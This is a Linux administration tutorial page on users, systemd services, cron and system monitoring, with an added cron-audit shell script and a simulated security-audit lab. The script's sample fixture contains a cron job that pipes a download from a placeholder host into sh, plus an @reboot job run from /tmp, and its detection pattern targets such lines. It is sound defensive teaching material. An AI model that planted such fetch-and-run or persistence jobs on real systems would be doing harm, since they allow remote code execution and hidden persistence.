CLH-009 of 015

System Administration

Manage users, services, and scheduled tasks. Control the machine.

User & Group Management

Managing users is fundamental to security. Know how to create, modify, and investigate user accounts.

| Command | Purpose |
|---|---|
| useradd -m username | Create user with home directory |
| passwd username | Set/change user password |
| usermod -aG group user | Add user to group |
| userdel -r username | Delete user and home directory |
| groups username | Show user's groups |
| id username | Show UID, GID, groups |
    # Check who has sudo access
    cat /etc/sudoers
    getent group sudo
    getent group wheel    # On RHEL/CentOS

    # Important files
    # /etc/passwd - User accounts (world-readable)
    # /etc/shadow - Password hashes (root only)
    # /etc/group  - Group definitions

Service Management (systemd)

Modern Linux uses systemd to manage services. Critical for both administration and incident response.

    # Service control
    systemctl start nginx      # Start service
    systemctl stop nginx       # Stop service
    systemctl restart nginx    # Restart service
    systemctl status nginx     # Check status
    systemctl enable nginx     # Start on boot
    systemctl disable nginx    # Don't start on boot

    # List all services
    systemctl list-units --type=service

    # Find suspicious services (security recon)
    systemctl list-units --type=service --state=running

Scheduled Tasks (Cron)

Cron runs scheduled tasks. Both legitimate admins and attackers use it for persistence.

Cron Syntax

* * * * * = minute hour day month weekday

Security Audit

Check /etc/crontab, /var/spool/cron/, and /etc/cron.d/

    # Edit your crontab
    crontab -e

    # View your crontab
    crontab -l

    # Examples (entries inside a crontab file, not shell commands)
    0 * * * * /script.sh      # Every hour
    0 0 * * * /backup.sh      # Daily at midnight
    */5 * * * * /check.sh     # Every 5 minutes

    # Audit ALL cron jobs (security recon); reading other users' crontabs needs root
    for user in $(cut -f1 -d: /etc/passwd); do
        echo "=== $user ==="
        crontab -u "$user" -l 2>/dev/null
    done
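The loop above reads only per-user crontabs. The following added example (not part of the original page) also walks /etc/crontab and /etc/cron.d/, labels each job with its run-as user, and marks entries for review; the function names, the `SUSPECT_RE` heuristic, and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit cron jobs under ROOT.
# SUSPECT_RE is a constructed heuristic, not a complete detection rule:
# jobs run from world-writable directories, or a download piped into a shell.
SUSPECT_RE='(/tmp/|/var/tmp/|/dev/shm/|(curl|wget)[^|]*[|] *(ba)?sh)'

# emit_jobs FILE SYSFMT OWNER -> flag, user, file, schedule, command (tab-separated)
# SYSFMT=1: system crontab format, with a user field after the schedule.
emit_jobs() {
    awk -v file="$1" -v sysfmt="$2" -v owner="$3" -v re="$SUSPECT_RE" '
        NF == 0 || $1 ~ /^#/ { next }                      # blank, comment
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }    # VAR=value line
        {
            n = ($1 ~ /^@/) ? 1 : 5      # @reboot-style or 5 time fields
            sched = $1
            for (i = 2; i <= n; i++) sched = sched " " $i
            user = owner; first = n + 1
            if (sysfmt == 1) { user = $(n + 1); first = n + 2 }
            cmd = $first
            for (i = first + 1; i <= NF; i++) cmd = cmd " " $i
            flag = (cmd ~ re) ? "REVIEW" : "ok"
            printf "%s\t%s\t%s\t%s\t%s\n", flag, user, file, sched, cmd
        }' "$1"
}

# audit_cron [ROOT]: ROOT defaults to the live system; pass a mounted image
# or evidence copy to audit offline.
audit_cron() {
    root="${1:-}"
    for f in "$root/etc/crontab" "$root"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        emit_jobs "$f" 1 ""
    done
    # Per-user crontabs are named after their owner (Debian: crontabs/ subdir).
    for f in "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        emit_jobs "$f" 0 "${f##*/}"
    done
}

# Constructed sample tree for trying the audit without touching a real host.
make_sample() {
    mkdir -p "$1/etc/cron.d" "$1/var/spool/cron/crontabs"
    printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n0 0 * * * root /backup.sh\n' > "$1/etc/crontab"
    printf '*/5 * * * * www-data curl -s http://example.invalid/u | sh\n' > "$1/etc/cron.d/check"
    printf '@reboot /tmp/.cache/run\n0 * * * * /script.sh\n' > "$1/var/spool/cron/crontabs/alice"
}
```

Run `audit_cron` as root with no argument to audit the live host, or call `make_sample` on an empty directory and pass that directory to `audit_cron` to see the output format first.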

System Monitoring

    # Disk usage
    df -h                # Filesystem usage
    du -sh /var/log/*    # Directory sizes

    # Memory
    free -h              # Memory usage

    # System info
    uptime               # Load average
    uname -a             # Kernel info
    hostnamectl          # OS info

    # Who's logged in?
    w                    # Logged in users + activity
    last                 # Login history
    lastlog              # Last login per user

LAB: SysAdmin Console

You're the new sysadmin. Audit this server for security issues: check users, services, cron jobs, and system health.

List users with sudo access
Check running services
Review scheduled tasks
Check disk space
    SysAdmin Console - Security Audit
    ===================================
    You have root access. Audit this server.
    Commands: getent, groups, id, systemctl, crontab, df, free, w, uptime
    Hint: Try 'getent group sudo' or 'systemctl list-units --type=service'

Completing CLH-007 to CLH-009 earns: CLI Specialist